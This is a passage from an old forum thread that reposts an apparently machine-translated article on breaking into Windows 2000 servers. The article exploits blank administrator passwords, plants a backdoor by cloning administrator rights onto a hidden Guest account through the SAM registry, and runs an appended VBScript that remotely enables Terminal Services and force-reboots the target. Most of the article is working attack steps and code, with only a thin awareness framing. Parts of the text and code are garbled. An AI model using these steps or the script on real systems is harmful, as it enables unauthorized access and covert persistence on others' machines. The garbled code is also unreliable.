If IIS is installed, you can use
Iisreset / Reboot
Restart the computer
From:
KMWAP,
Time: 2003-11-16 14:33:00,
ID: 2297586
Please have a specific point!
From:
CXZ9,
Time: 2003-11-16 14:51:00,
ID: 2297613
Network security management
Unit: Nanjing Radio and TV University Author: Han rule
Abstract: This article tries to introduce the implementation methods and processes of the computers of others from a hacker, aiming to improve the vigilance of operating system users such as Windows 2000, so that they understand their safety management mechanisms, which focus on and strengthening network security management.
Keywords: stepping point, weak password, clone account (reservation)
There are many users who feel that Windows 2000 is better, so it has many users. But some users don't really understand the security management mechanism of Windows 2000. This paper tries to discuss its simple discussion from a hacker.
First, step on the point
Stepping is the observation of a computer for invasion.
Suppose the step is over, scanned to a Windows 2000 Server (or higher) computer, and there is a weak password, assuming that the weak password is: Administrator account (Administrator), the password is empty.
The weak password has no detailed specification definition, which can be roughly understood to be guessed, such as: Windows 2000 has at least one user is known, such as Administrator (administrator account), and guest (default is disabled by the system). Therefore, the attacker only needs to test the password, and most people may not set the password or use simple numbers or dates as a password for various reasons, but now there are many softwares can deciphered in a short period of time, and the fragmentation is not Need to have high academic or techniques.
Second, invading
Run the CMD in this unit to open a terminal, the command is as follows:
Cscript * .vbe 192.168.0.1 administrator "" 3389 / fr
Explanation: Cscript * .vbe This is a command (* represents any character, because this VBScript scriptor is your own, you can arbitrarily name. See the appendix.), The back is the IP address of the vulnerability computer, then it The administrator account name, then the account password, because 192.168.0.1 This server's administrator password is empty, then use double quotes to be empty, then the port is the port (you can set the port of the terminal, but the default port Yes 3389), / fr is the restart command (forced restart, you can / R: Ordinary restart, it is recommended to use forced restart commands).
Terminal Server is only available over Windows 2000 Server (including Server), and Pro is not possible. This version can detect the version of the server. If it is Pro, you will be prompted to exit installation!
Then use the ping command to test it (ping 192.168.0.1 -t) to see if it is restarted. Waiting for the restart, you can go to the next step.
Third, cloning account (reserved behind)
Run the CMD in this unit to set up an IPC $ connected to DOS.
Net use //192.168.0.1/ipc ("" / user: "administrator" commands After the PSU is uploaded to the C: / WinNT / System32 directory of the target machine.
Copy psu.exe //192.168.0.1/admin $/system32
After the upload is over, began to do the back door account.
Connect the terminal with the connection tool, assume that the guest user is disabled, we just want to use the guest to do the back door account!
Run the CMD in the server, enter:
PSU -P regedit -i PID
Here, the rear PID is the value of the system process Winlogon. We right-click under the taskbar, see the task manager, see the process tab, find the Winlogon process, the rear value is Winlogon's PID value, suppose is 1234 So, the command is this pSU -P regedit -i 1234.
In this way, open the registry directly, you can read the information of the local SAM.
Open key value HKEY_LOCAL_MACHINE / SAM / SAM / DOMAINS / Account / Users
The following is the local user information, what we have to do is the account of the disable guest to get the administrator privilege.
HKEY_LOCAL_MACHINE / SAM / SAM / DOMAINS / Account / Users / Names
View the type of administrator, is IF4, then look at the type of guest, is IF5, know the type, open
HKEY_LOCAL_MACHINE / SAM / SAM / DOMAINS / Account / Users / 000001F4
This value, double-click the f, copy all the characters inside, then open
HKEY_LOCAL_MACHINE / SAM / SAM / DOMAINS / Account / Users / 000001F5
Double-click the f, paste the just copy to the inside!
After doing it,
HKEY_LOCAL_MACHINE / SAM / SAM / DOMAINS / Account / Users / 000001F5
with
HKEY_LOCAL_MACHINE / SAM / SAM / DOMAINS / Account / Users / Names / Guest
These two key values are exported, deleted the two key values after exporting! Then import it again! Close the registry.
Open the CMD and enter in the command line:
Net user guest password (this command is set to Guest setting password, the back Password is the password)
Then enter:
Net user guest / active: y
This command is to activate the guest account and disable it.
Net user guest / active: n
(The above three lines must be performed under DOS)
Open computer management, see the user, the guest account is also disabled. But at this time it already has administrator privileges!
And do not display in the administrator group, you can also log in to the terminal, which is the same as the Administrator account.
appendix
ON Error ResMe next
Set outstreem = wscript.stdout
Set instreem = wscript.stdin
IF (Lcase (Right (Wscript.Fullname, 11)) = "wscript.exe") THEN
Set objshell = wscript.createObject ("wscript.shell") objshell.run ("cmd.exe / k cscript // nologo" & chr (34) & wscript.scriptfullname & chr (34))
WScript.quit
END IF
IF wscript.Arguments.count <3 THEN
USAGE ()
WScript.echo "Not Enough Parameters."
WScript.quit
END IF
ipaddress = wscript.arguments (0)
Username = wscript.arguments (1)
Password = wscript.arguments (2)
IF wscript.arguments.count> 3 THEN
Port = wscript.Arguments (3)
Else
Port = 3389
END IF
IF not isnumeric (port) or port <1 or port> 65000 THEN
Wscript.echo "The Number of Port is Error."
WScript.quit
END IF
IF wscript.arguments.count> 4 THEN
Reboot = wscript.Arguments (4)
Else
Reboot = ""
END IF
USAGE ()
OutStreem.write "Conneting" & ipaddress & "..."
Set objlocator = creteObject ("wbemscripting.swbemlocator")
Set objswbemservices = objlocator.connectServer (iPaddress, "Root / Cimv2", UserName, Password)
Showerror (Err.Number)
Objswbemservices.security_.privileges.add 23, True
Objswbemservices.security_.privileges.add 18, True
OutStreem.write "Checking OS Type ...."
Set colinstoscaption = objswbemservices.execQuery ("Select Caption from Win32_Operatingsystem")
For Each Objinstoscaption in Colinstoscaption
IF INSTR (Objinstoscaption.caption, "Server")> 0 THEN
WScript.echo "OK!"
Else
WScript.echo "OS Type IS" & Objinstoscaption.caption
OutStreem.write "Do you want to cancel setup? [y / n]"
Strcancel = instreem.readline
IF LCASE (STRCANCEL) <> "n" Then WScript.quit
END IF
NEXT
OutStreem.write "Writing Into Registry ...."
Set objinstreg = objlocator.connectServer (iPaddress, "root / default", username, password) hklm = & h80000002
HKU = & h8000000003
With objinstreg
.createKey, "Software / Microsoft / Windows / CurrentVersion / Netcache"
.SetdWordValue HKLM, "Software / Microsoft / Windows / CurrentVersion / Netcache", "Enabled", 0
.createKey HKLM, "Software / Policies / Microsoft / Windows / Installer"
.SetdWordValue HKLM, "Software / Policies / Microsoft / Windows / Installer", "EnableadmintsRemote", 1
.SetdWordValue HKLM, "System / CurrentControlset / Control / Terminal Server", "Tsenabled", 1
.SetdWordValue HKLM, "System / CurrentControlset / Services / Termdd", "START", 2
.SetdWordValue HKLM, "System / CurrentControlset / Services / Termservice", "START", 2
.SetstringValue HKU, ". Default / Keyboard Layout / Toggle", "HotKey", "1"
.SetdWordValue HKLM, "System / CurrentControlset / Control / Terminal Server / WinStations / RDP-TCP", "Portnumber", Port
End with
Showerror (Err.Number)
REBT = LCase (Reboot)
Flag = 0
if rebt = "/ r" or rebt = "- r" or rebt = "/ r" THEN FLAG = 2
if rebt = "/ fr" or reason = "/ fr" THEN FLAG = 6
IF Flag <> 0 THEN
OutStreem.write "now, reboot target ...."
StrwqlQuery = "SELECT * WIN32_OPERATINGSYSTEM Where primary = 'true'"
Set colinstances = objswbemservices.execQuery (strwqlQuery)
For Each Objinstance in Colinstances
Objinstance.win32shutdown (flag)
NEXT
Showerror (Err.Number)
Else
Wscript.echo "you need to reboot target." & vbcrlf & "."
END IF
Wscript.echo "You Can Logon Terminal Services on" & Port & "Later. Good Luck!" Function Showerror (ERRORNUMBER)
IF errornumber dam
Wscript.echo "Error 0X" & CSTR (HEX (Err.Number) & "."
IF Err.Description <> "" "" "
WScript.echo "Error Description:" & Err.Description & "."
END IF
WScript.quit
Else
WScript.echo "OK!"
END IF
END FUNCTION
Function usage ()
WScript.echo String (80, "-")
Wscript.echo "This is the script of the Windows 2000 terminal. Copyright belongs to: Hanzhi"
WScript.echo "homepage
Www.i94self.com; e_mail: i94self@hotmail.com "
WScript.echo "Usage is as follows:"
Wscript.echo "CScript" & wscript.scriptfullname "Targetip username password [port] [/ r | / fr]"
WScript.echo "Port: The default is 3389."
WScript.echo "/ R: Ordinary restart"
WScript.echo "/ FR: forcibly restart"
WScript.echo String (80, "-") & vbcrlf
END FUNCTION
Note: 1. This script has a strong aggression, please do not use for illegal purposes, otherwise the consequences are at your own risk.
2. Because this program has a command to modify the registry, anti-virus may think is a hacker program to remind you.
